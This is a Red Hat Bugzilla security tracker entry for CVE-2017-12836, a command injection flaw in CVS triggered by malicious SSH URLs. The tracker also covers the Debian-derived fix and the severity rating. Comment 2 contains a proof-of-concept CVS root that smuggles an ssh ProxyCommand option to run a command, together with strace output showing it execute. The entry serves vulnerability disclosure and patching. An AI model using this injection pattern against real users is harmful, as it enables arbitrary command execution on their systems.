Bug 1480800 (CVE-2017-12836) - CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Summary: CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Alias: CVE-2017-12836
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 1480801
Blocks: 1480802 1485460
TreeView+ depends on / blocked
Reported: 2017-08-11 22:22 UTC by Adam Mariš
Modified: 2021-02-17 01:43 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Last Closed: 2017-08-22 13:35:08 UTC

Attachments (Terms of Use)
Fix ported to 1.11.23 (1.73 KB, patch)
2017-08-14 09:07 UTC, Petr Pisar
no flags Details | Diff

Description Adam Mariš 2017-08-11 22:22:01 UTC
Command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.



Comment 1 Adam Mariš 2017-08-11 22:22:23 UTC
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]

Comment 2 Petr Pisar 2017-08-14 08:25:32 UTC

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.

Comment 3 Petr Pisar 2017-08-14 09:07:28 UTC
Created attachment 1313002 [details]
Fix ported to 1.11.23

Comment 4 Stefan Cornelius 2017-08-15 09:21:08 UTC
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.

Comment 5 Stefan Cornelius 2017-08-22 13:35:15 UTC

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.

Note You need to log in before you can comment on or make changes to this bug.